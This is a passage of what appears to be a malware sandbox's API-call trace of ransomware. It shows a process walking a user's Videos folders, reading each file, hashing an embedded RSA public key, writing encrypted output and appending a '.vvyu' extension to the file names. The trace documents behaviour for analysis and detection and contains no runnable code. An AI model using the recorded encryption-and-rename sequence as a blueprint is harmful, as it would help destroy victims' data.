hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a228 | out: hHeap=0x6a0000) returned 1 [0196.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0196.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0196.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cdb8 | out: hHeap=0x6a0000) returned 1 [0196.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.209] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.213] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0x7e51, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0x7e51, lpOverlapped=0x0) returned 1 [0196.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.214] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x7e56, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.214] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.215] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.216] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.216] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.216] CloseHandle (hObject=0x52c) returned 1 [0196.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0196.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0196.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.218] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\7jjUxF5I.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\7jjuxf5i.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\7jjUxF5I.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\7jjuxf5i.mp4.vvyu")) returned 1 [0196.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.220] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0196.224] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c3a7950, ftCreationTime.dwHighDateTime=0x1d899ee, ftLastAccessTime.dwLowDateTime=0x22ba94e0, ftLastAccessTime.dwHighDateTime=0x1d89d4f, ftLastWriteTime.dwLowDateTime=0x22ba94e0, ftLastWriteTime.dwHighDateTime=0x1d89d4f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C9Qz99w", cAlternateFileName="")) returned 1 [0196.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0196.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfc) returned 0x2c70bc8 [0196.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0196.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2edf8 [0196.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eea0 [0196.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0196.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2ef48 [0196.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49790 [0196.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47958 | out: hHeap=0x6a0000) returned 1 [0196.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be0bf0 | out: hHeap=0x6a0000) returned 1 [0196.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x781d38 | out: hHeap=0x6a0000) returned 1 [0196.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea788 | out: hHeap=0x6a0000) returned 1 [0196.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee4f0 | out: hHeap=0x6a0000) returned 1 [0196.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0196.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee4f0 [0196.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0196.227] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2add8e80, ftCreationTime.dwHighDateTime=0x1d8a6a4, ftLastAccessTime.dwLowDateTime=0x268f99e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e0, ftLastWriteTime.dwLowDateTime=0x268f99e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="htWDnwTyY", cAlternateFileName="HTWDNW~1")) returned 1 [0196.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0196.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee438 [0196.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49848 [0196.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee438 | out: hHeap=0x6a0000) returned 1 [0196.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0196.228] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65501dc0, ftCreationTime.dwHighDateTime=0x1d8a065, ftLastAccessTime.dwLowDateTime=0x5e385880, ftLastAccessTime.dwHighDateTime=0x1d8a3c7, ftLastWriteTime.dwLowDateTime=0x5e385880, ftLastWriteTime.dwHighDateTime=0x1d8a3c7, nFileSizeHigh=0x0, nFileSizeLow=0x10a45, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSPqrTgqm.swf", cAlternateFileName="MSPQRT~1.SWF")) returned 1 [0196.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa0) returned 0x2d2eca8 [0196.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xee) returned 0x2be2220 [0196.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2eca8 | out: hHeap=0x6a0000) returned 1 [0196.229] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\MSPqrTgqm.swf") returned=".swf" [0196.229] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\F72Mw_KNQRugYJJCcBc\\MSPqrTgqm.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\f72mw_knqrugyjjccbc\\mspqrtgqm.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.230] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=68165) returned 1 [0196.231] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.234] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x10a1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.234] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.236] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.236] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x10a45, lpOverlapped=0x0) returned 1 [0196.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.237] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.237] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea788) returned 1 [0196.238] CryptCreateHash (in: hProv=0x6ea788, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.238] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.238] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0196.238] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0196.238] GetLastError () returned 0x0 [0196.239] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0196.239] CryptReleaseContext (hProv=0x6ea788, dwFlags=0x0) returned 1 [0196.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0196.239] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0196.239] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0196.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.239] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0196.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0196.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10a50) returned 0x2d4b778 [0196.240] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0196.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0196.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0196.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0196.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cdb8 [0196.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0196.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2ce00 [0196.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0196.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a258 [0196.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a270 [0196.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.241] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a270 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a258 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x74ad40 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0196.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a270 | out: hHeap=0x6a0000) returned 1 [0196.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a258 | out: hHeap=0x6a0000) returned 1 [0196.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0196.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.245] GetCurrentThreadId () returned 0x264 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d47200 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea788 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.246] GetCurrentThreadId () returned 0x264 [0196.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c0ec50 [0196.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0ec50 [0196.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c0d0a0 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2b8 [0196.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.248] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.249] RtlAllocateHeap 